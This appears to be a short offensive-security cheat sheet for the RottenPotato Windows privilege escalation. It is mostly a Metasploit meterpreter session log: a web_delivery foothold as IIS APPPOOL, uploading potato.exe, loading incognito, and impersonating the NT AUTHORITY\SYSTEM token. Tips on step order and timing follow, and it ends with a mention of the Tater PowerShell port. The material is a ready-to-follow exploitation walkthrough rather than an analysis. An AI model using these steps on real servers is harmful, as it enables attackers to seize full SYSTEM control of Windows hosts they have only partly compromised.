Vulnerability reference:

RottenPotato

Local Privilege Escalation from Windows Service Accounts to SYSTEM

Videos for example

Usage of msf

msf exploit(web_delivery) > set ExitOnsession false
msf exploit(web_delivery) > run
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > getprivs
===========================================================
Enabled Process Privileges
===========================================================
 SeAssignPrimaryTokenPrivilege

meterpreter > upload  /root/potato.exe C:\Users\Public
meterpreter > cd C:\\Users\\Public
meterpreter > use incognito
meterpreter > list_tokens -u
NT AUTHORITY\IUSR

meterpreter > execute -cH -f ./potato.exe
meterpreter > list_tokens -u
NT AUTHORITY\IUSR
NT AUTHORITY\SYSTEM

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Get a shell has Privileges:SeAssignPrimaryTokenPrivilege

iis

Get system Privilege

potato


  • It is important to impersonate the token (or run list_tokens -u) quickly after runnning the binary.
  • It is also important to follow the order of the steps.
  • Make sure you "use incognito" before running the binary.

Tater

a PowerShell implementation of the Hot Potato Windows Privilege Escalation exploit